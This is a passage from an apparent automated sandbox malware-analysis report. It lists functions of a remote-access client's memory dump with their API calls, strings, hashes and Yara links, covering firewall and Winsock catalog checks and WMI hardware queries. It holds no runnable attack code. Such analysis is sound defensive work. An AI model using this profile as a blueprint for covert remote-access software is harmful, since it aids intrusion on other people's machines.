                                                                                      • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                      • API String ID: 4251163631-545709139
                                                                                      • Opcode ID: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                      • Instruction ID: 76ed8f4553af2ae4cc76032582d3c5cf4b75be54885724a55a46303ac3459834
                                                                                      • Opcode Fuzzy Hash: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                      • Instruction Fuzzy Hash: 07313971E002299BD761DF74D984BE9F7B6EB08729F540164E42DC7A80D7344984CF91
                                                                                      Function 11015010 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • wsprintfA.USER32 ref: 110150CA
                                                                                      • _memset.LIBCMT ref: 1101510E
                                                                                      • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015148
                                                                                      Strings
                                                                                      • PackedCatalogItem, xrefs: 11015132
                                                                                      • %012d, xrefs: 110150C4
                                                                                      • NSLSP, xrefs: 11015158
                                                                                      • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101504B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: QueryValue_memsetwsprintf
                                                                                      • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                      • API String ID: 1333399081-1346142259
                                                                                      • Opcode ID: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                      • Instruction ID: d38f3a4d66d5a90606c53f5b1b84405609ec5bb3b13ff7cea0d7775b25b40b12
                                                                                      • Opcode Fuzzy Hash: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                      • Instruction Fuzzy Hash: C6419D71D02269AFEB11DB64CC90BDEF7B8EB44314F0445E9E819A7281EB35AB48CF50
                                                                                      Function 1100FDC0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100FDED
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100FE10
                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 1100FE94
                                                                                      • __CxxThrowException@8.LIBCMT ref: 1100FEA2
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100FEB5
                                                                                      • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100FECF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                      • String ID: bad cast
                                                                                      • API String ID: 2427920155-3145022300
                                                                                      • Opcode ID: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                      • Instruction ID: 563b417412927bd42dfe2d2268ce551a617b01fe8fe711e168dc892134580a96
                                                                                      • Opcode Fuzzy Hash: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                      • Instruction Fuzzy Hash: 5731E975D002669FD711DF94C890BAEF7B8EB04B68F10426DD921A7291DB717D40CB92
                                                                                      Function 11144BD0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                      • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                      • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                      • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                      • API String ID: 3494822531-1878648853
                                                                                      • Opcode ID: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                      • Instruction ID: dd955378f98185685044f21f066d1e50e049b7277ab8e5714ac6db0ba135c9a8
                                                                                      • Opcode Fuzzy Hash: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                      • Instruction Fuzzy Hash: AB518835D4022E5BD711CF24DC50BDEF7A4AF15B08F2401A4D8997BA80EBB27B84CBA5
                                                                                      Function 11107290 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                      • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                      • std::exception::exception.LIBCMT ref: 11107414
                                                                                      • __CxxThrowException@8.LIBCMT ref: 11107429
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                      • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                      • API String ID: 2851125068-2390547818
                                                                                      • Opcode ID: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                      • Instruction ID: 20da51148d2406ef940ba90f631bbe284ff6dbb95dc7cb8c25b5cdc78ae8e1aa
                                                                                      • Opcode Fuzzy Hash: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                      • Instruction Fuzzy Hash: 2A4115B4D09B449FC761CF6A8940BDAFBE8EFA9604F00490EE5AE93210D7797500CF56
                                                                                      Function 11017300 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 1101733C
                                                                                      • CoInitialize.OLE32(00000000), ref: 11017345
                                                                                      • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                      • CoUninitialize.COMBASE ref: 110173D0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                      • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                      • API String ID: 2407233060-578995875
                                                                                      • Opcode ID: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                      • Instruction ID: df925c951649f52390f194a40c23bf9fa59b5f59fb7a44760539d7ccd5920114
                                                                                      • Opcode Fuzzy Hash: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                      • Instruction Fuzzy Hash: 7F2137B5E041259BDB11DFA0CC46BBAB6E8AF40308F0040B9EC69DB184FA79E940D7A1
                                                                                      Function 11017220 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 11017252
                                                                                      • CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                      • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                      • CoUninitialize.COMBASE ref: 110172E0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                      • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                      • API String ID: 2407233060-2037925671
                                                                                      • Opcode ID: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                      • Instruction ID: c2f3c346b695d23426c96ecc328f7bdb1aeadc280033f44fb53199f8ba8604cb
                                                                                      • Opcode Fuzzy Hash: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                      • Instruction Fuzzy Hash: 19210575E016299BD712DFE0CC45BEEB7E89F80718F0001A8FC29DB184EA7AE945C761
                                                                                      Function 111386B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • Client, xrefs: 11138705
                                                                                      • DoICFConfig() OK, xrefs: 11138786
                                                                                      • AutoICFConfig, xrefs: 11138700
                                                                                      • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 1113879C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick
                                                                                      • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                      • API String ID: 536389180-1512301160
                                                                                      • Opcode ID: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                      • Instruction ID: a0019f70d98f4d819e239f855ef0bc8db2e19db1671bc02c3e0d3b7677daedde
                                                                                      • Opcode Fuzzy Hash: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                      • Instruction Fuzzy Hash: E4210578A247AB4AFB039B759ED4755FB83578073EF450278DE10862CCDB74A458CB42
                                                                                      Function 11096970 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 11096984
                                                                                      • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                      • CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                      • CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                      • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                      • API String ID: 3222248624-258972079
                                                                                      • Opcode ID: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                      • Instruction ID: ffe5b7852bae71a5603cb4f529131e3535c43cf5cc9a129c5e7f13935f1cb029
                                                                                      • Opcode Fuzzy Hash: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                      • Instruction Fuzzy Hash: 9C11AC74E0012DABC700EAE5DC95AEFBB68AF45709F100029F50AEB144EA21EA40C7E2
                                                                                      Function 11025D00 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11025D16
                                                                                      • K32GetProcessImageFileNameA.KERNEL32(?,?,?,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D32
                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025D46
                                                                                      • SetLastError.KERNEL32(00000078,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D69
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                      • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                      • API String ID: 4186647306-532032230
                                                                                      • Opcode ID: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                      • Instruction ID: 74662284ed99b9a54ad109221a671fe8fcdc3fa540ca7c31caa090441a4958f5
                                                                                      • Opcode Fuzzy Hash: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                      • Instruction Fuzzy Hash: 98016D72601718ABE330DEA5EC48F87B7E8EB88765F10052AF95697200D631E8018BA4
                                                                                      Function 1110F2B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                      • CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                      • CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
